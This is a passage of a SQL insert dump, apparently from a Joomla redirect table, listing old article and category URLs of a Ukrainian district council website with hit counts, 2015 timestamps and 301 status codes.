00:00:00',301),(20812,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&Itemid=0&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 02:26:37','0000-00-00 00:00:00',301),(20813,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=765:-qq&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 02:26:43','0000-00-00 00:00:00',301),(20814,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:28:19','0000-00-00 00:00:00',301),(20815,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:28:25','0000-00-00 00:00:00',301),(20816,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1086:2013-09-16-13-00-16&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:28:34','0000-00-00 00:00:00',301),(20817,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=566:6-2012-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:28:50','0000-00-00 00:00:00',301),(20818,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=659:-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:28:55','0000-00-00 00:00:00',301),(20819,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1153:-2013-&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:29:14','0000-00-00 00:00:00',301),(20820,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1096:2013-09-24-13-34-16&Itemid=94&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:29:24','0000-00-00 00:00:00',301),(20821,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=963:2013-03-13-06-16-53&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:29:29','0000-00-00 00:00:00',301),(20822,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=751:-15-6-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:29:39','0000-00-00 00:00:00',301),(20823,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1019:2013-06-06-11-26-38&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:29:45','0000-00-00 00:00:00',301),(20824,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:30:07','0000-00-00 00:00:00',301),(20825,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=465:-l-r-2011-&Itemid=73&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:30:18','0000-00-00 00:00:00',301),(20826,'http://www.malyn-rayrada.org.ua/index.php?id=47&Itemid=86&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 02:30:39','0000-00-00 00:00:00',301),(20827,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=525:2011-12-30-10-19-27&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:30:50','0000-00-00 00:00:00',301),(20828,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:31:13','0000-00-00 00:00:00',301),(20829,'http://www.malyn-rayrada.org.ua/index.php?catid=4:2010-06-05-12-51-18&id=4:--1062010&Itemid=8&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:31:26','0000-00-00 00:00:00',301),(20830,'http://www.malyn-rayrada.org.ua/index.php?id=46&Itemid=85&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 02:31:31','0000-00-00 00:00:00',301),(20831,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1321:------------------lr-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 02:31:36','0000-00-00 00:00:00',301),(20832,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:------qq&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:32:11','0000-00-00 00:00:00',301),(20833,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:32:23','0000-00-00 00:00:00',301),(20834,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=609:-q-q&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:32:28','0000-00-00 00:00:00',301),(20835,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=609:-q-q&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:32:33','0000-00-00 00:00:00',301),(20836,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1144:-lr&Itemid=95&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 02:32:55','0000-00-00 00:00:00',301),(20837,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=918:-2013-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:33:10','0000-00-00 00:00:00',301),(20838,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=808:2012-10-30-13-56-37&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:33:22','0000-00-00 00:00:00',301),(20839,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=437:-----l-r--2012-2015-&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:33:27','0000-00-00 00:00:00',301),(20840,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:33:41','0000-00-00 00:00:00',301),(20841,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1183:2014-01-28-09-18-31&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:33:45','0000-00-00 00:00:00',301),(20842,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:33:55','0000-00-00 00:00:00',301),(20843,'http://www.malyn-rayrada.org.ua/index.php?id=40:--28032012-&Itemid=77&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 02:34:00','0000-00-00 00:00:00',301),(20844,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=778:2012-10-03-08-53-07&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:34:26','0000-00-00 00:00:00',301),(20845,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:34:28','0000-00-00 00:00:00',301),(20846,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=721:-lr&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:34:34','0000-00-00 00:00:00',301),(20847,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=733:-10-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:34:36','0000-00-00 00:00:00',301),(20848,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=472:-------------l-r-------&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:34:38','0000-00-00 00:00:00',301),(20849,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=701:-2011-2017-&Itemid=82&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:34:40','0000-00-00 00:00:00',301),(20850,'http://www.malyn-rayrada.org.ua/index.php?id=33&Itemid=66&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 02:34:49','0000-00-00 00:00:00',301),(20851,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=802:-i-i-i-i-i&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:34:59','0000-00-00 00:00:00',301),(20852,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1317:2014-05-25-18-25-09&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 02:35:03','0000-00-00 00:00:00',301),(20853,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1164:2013-12-29-11-46-36&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:35:05','0000-00-00 00:00:00',301),(20854,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1329:2014-06-02-11-51-47&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 02:35:16','0000-00-00 00:00:00',301),(20855,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1057:--22072013--2100-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:35:18','0000-00-00 00:00:00',301),(20856,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1113:2013-10-23-09-26-07&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:35:20','0000-00-00 00:00:00',301),(20857,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1014:2013-06-03-06-43-44&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:35:22','0000-00-00 00:00:00',301),(20858,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=997:-27-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:35:26','0000-00-00 00:00:00',301),(20859,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:35:30','0000-00-00 00:00:00',301),(20860,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=ru&layout=blog&limitstart=30&option=com_content&view=category','','','',2,0,'2015-12-11 02:35:34','0000-00-00 00:00:00',301),(20861,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=911:2013-01-22-13-27-41&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:35:51','0000-00-00 00:00:00',301),(20862,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=592:2012-02-27-15-06-10&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:36:09','0000-00-00 00:00:00',301),(20863,'http://www.malyn-rayrada.org.ua/index.php?id=49:--12042013-&Itemid=88&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',3,0,'2015-12-11 02:36:14','0000-00-00 00:00:00',301),(20864,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1204:2014-01-31-07-51-23&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:36:19','0000-00-00 00:00:00',301),(20865,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=819:2012-11-14-16-40-09&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:36:23','0000-00-00 00:00:00',301),(20866,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=212:2010-12-15-14-49-15&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:36:28','0000-00-00 00:00:00',301),(20867,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1157:-11-2013-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:36:47','0000-00-00 00:00:00',301),(20868,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:37:11','0000-00-00 00:00:00',301),(20869,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=918:-2013-2015-&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:37:16','0000-00-00 00:00:00',301),(20870,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=680:2012-05-17-10-02-41&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:37:21','0000-00-00 00:00:00',301),(20871,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-11-2013-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:37:33','0000-00-00 00:00:00',301),(20872,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1094:2013-09-24-05-02-52&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:37:38','0000-00-00 00:00:00',301),(20873,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=995:-2012-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:37:42','0000-00-00 00:00:00',301),(20874,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=716:2012-06-14-15-19-24&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:37:54','0000-00-00 00:00:00',301),(20875,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=200:-----------------2006-2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:38:06','0000-00-00 00:00:00',301),(20876,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=587:2012-02-27-13-44-05&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:38:10','0000-00-00 00:00:00',301),(20877,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=210:-2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',49,0,'2015-12-11 02:38:34','0000-00-00 00:00:00',301),(20878,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1100:2013-10-02-18-03-10&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:38:39','0000-00-00 00:00:00',301),(20879,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=472:-l-r-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:38:43','0000-00-00 00:00:00',301),(20880,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 02:38:49','0000-00-00 00:00:00',301),(20881,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1218:2014-02-21-15-02-18&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:39:13','0000-00-00 00:00:00',301),(20882,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=983:2013-04-04-11-23-57&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:39:37','0000-00-00 00:00:00',301),(20883,'http://www.malyn-rayrada.org.ua/index.php?id=33&Itemid=66&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',3,0,'2015-12-11 02:39:42','0000-00-00 00:00:00',301),(20884,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:39:47','0000-00-00 00:00:00',301),(20885,'http://www.malyn-rayrada.org.ua/index.php?catid=44:--12092012-&id=757:2012-09-12-09-47-49&Itemid=83&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:40:03','0000-00-00 00:00:00',301),(20886,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1047:2013-07-10-05-51-36&Itemid=92&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:40:07','0000-00-00 00:00:00',301),(20887,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=201:--------l-r--2011--&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:40:17','0000-00-00 00:00:00',301),(20888,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1317:2014-05-25-18-25-09&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 02:40:35','0000-00-00 00:00:00',301),(20889,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=940:2013-02-21-14-02-14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:40:40','0000-00-00 00:00:00',301),(20890,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=568:-2011-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:40:44','0000-00-00 00:00:00',301),(20891,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1179:2014-01-21-12-44-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:40:49','0000-00-00 00:00:00',301),(20892,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1043:-2013-&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:40:54','0000-00-00 00:00:00',301),(20893,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:41:02','0000-00-00 00:00:00',301),(20894,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=541:2012-01-26-11-55-32&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:41:06','0000-00-00 00:00:00',301),(20895,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 02:41:27','0000-00-00 00:00:00',301),(20896,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1126:2013-10-31-12-52-35&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:41:37','0000-00-00 00:00:00',301),(20897,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=708:-l-r&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:42:05','0000-00-00 00:00:00',301),(20898,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1194:-2012-2015-&Itemid=97&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:42:09','0000-00-00 00:00:00',301),(20899,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=328:2011-05-20-16-23-02&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:42:14','0000-00-00 00:00:00',301),(20900,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:42:18','0000-00-00 00:00:00',301),(20901,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1162:2013-12-19-06-13-29&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:42:23','0000-00-00 00:00:00',301),(20902,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=579:-2011-2015-&Itemid=77&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:42:27','0000-00-00 00:00:00',301),(20903,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:42:38','0000-00-00 00:00:00',301),(20904,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=549:-2010-2012-&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:42:43','0000-00-00 00:00:00',301),(20905,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=329:2011-05-20-16-25-10&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:42:47','0000-00-00 00:00:00',301),(20906,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1300:2014-04-25-07-21-54&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 02:42:51','0000-00-00 00:00:00',301),(20907,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=450:-l-2011-2013-r&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:43:03','0000-00-00 00:00:00',301),(20908,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=699:-2011-2015-&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:43:07','0000-00-00 00:00:00',301),(20909,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=592:2012-02-27-15-06-10&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:43:12','0000-00-00 00:00:00',301),(20910,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=321:------------l---------r--2011-2016-&Itemid=66&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:43:16','0000-00-00 00:00:00',301),(20911,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=689:2012-05-29-17-48-13&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:43:32','0000-00-00 00:00:00',301),(20912,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=928:2013-02-21-09-10-17&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:43:36','0000-00-00 00:00:00',301),(20913,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=735:2012-07-18-13-32-43&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:43:50','0000-00-00 00:00:00',301),(20914,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=827:2012-11-20-17-44-21&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:44:01','0000-00-00 00:00:00',301),(20915,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=449:2011-10-28-08-04-47&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:44:10','0000-00-00 00:00:00',301),(20916,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=773:2012-10-02-06-48-57&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:44:14','0000-00-00 00:00:00',301),(20917,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:44:30','0000-00-00 00:00:00',301),(20918,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1191:-2014-&Itemid=97&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:44:48','0000-00-00 00:00:00',301),(20919,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=554:-l-r&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:44:52','0000-00-00 00:00:00',301),(20920,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-11-2013-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:45:03','0000-00-00 00:00:00',301),(20921,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1096:2013-09-24-13-34-16&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:45:08','0000-00-00 00:00:00',301),(20922,'http://www.malyn-rayrada.org.ua/index.php?id=40:--28032012-&Itemid=77&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',3,0,'2015-12-11 02:45:13','0000-00-00 00:00:00',301),(20923,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:45:17','0000-00-00 00:00:00',301),(20924,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=997:-27-&Itemid=14&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 02:45:22','0000-00-00 00:00:00',301),(20925,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=963:2013-03-13-06-16-53&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:45:32','0000-00-00 00:00:00',301),(20926,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=870:2012-12-17-07-02-51&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:45:46','0000-00-00 00:00:00',301),(20927,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=802:-i-i-i-i-i&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:45:50','0000-00-00 00:00:00',301),(20928,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1291:2014-04-23-11-37-34&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:46:01','0000-00-00 00:00:00',301),(20929,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1218:2014-02-21-15-02-18&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:46:10','0000-00-00 00:00:00',301),(20930,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1113:2013-10-23-09-26-07&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:46:14','0000-00-00 00:00:00',301),(20931,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:46:19','0000-00-00 00:00:00',301),(20932,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=438:-----------l--r&Itemid=72&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:46:23','0000-00-00 00:00:00',301),(20933,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1334:2014-06-06-05-54-20&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:46:38','0000-00-00 00:00:00',301),(20934,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',3,0,'2015-12-11 02:46:55','0000-00-00 00:00:00',301),(20935,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1165:-2014-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:46:59','0000-00-00 00:00:00',301),(20936,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:47:15','0000-00-00 00:00:00',301),(20937,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1310:2014-05-06-14-07-43&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 02:47:19','0000-00-00 00:00:00',301),(20938,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=855:2012-12-12-14-22-20&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:47:23','0000-00-00 00:00:00',301),(20939,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=509:2011-12-20-08-03-11&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:47:28','0000-00-00 00:00:00',301),(20940,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=643:-6-&Itemid=80&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:47:39','0000-00-00 00:00:00',301),(20941,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 02:47:43','0000-00-00 00:00:00',301),(20942,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=641:2012-04-03-12-52-00&Itemid=64&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:47:51','0000-00-00 00:00:00',301),(20943,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1022:-------lr---&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:48:03','0000-00-00 00:00:00',301),(20944,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:48:20','0000-00-00 00:00:00',301),(20945,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:48:25','0000-00-00 00:00:00',301),(20946,'http://www.malyn-rayrada.org.ua/index.php?catid=6:2010-06-05-12-52-17&id=6:2010-06-05-14-26-47&Itemid=9&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:48:29','0000-00-00 00:00:00',301),(20947,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=675:2012-05-17-09-49-52&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:48:34','0000-00-00 00:00:00',301),(20948,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=465:-l-r-2011-&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:49:05','0000-00-00 00:00:00',301),(20949,'http://www.malyn-rayrada.org.ua/index.php?id=42&Itemid=80&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 02:49:09','0000-00-00 00:00:00',301),(20950,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=444:2011-10-24-07-04-45&Itemid=72&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:49:13','0000-00-00 00:00:00',301),(20951,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 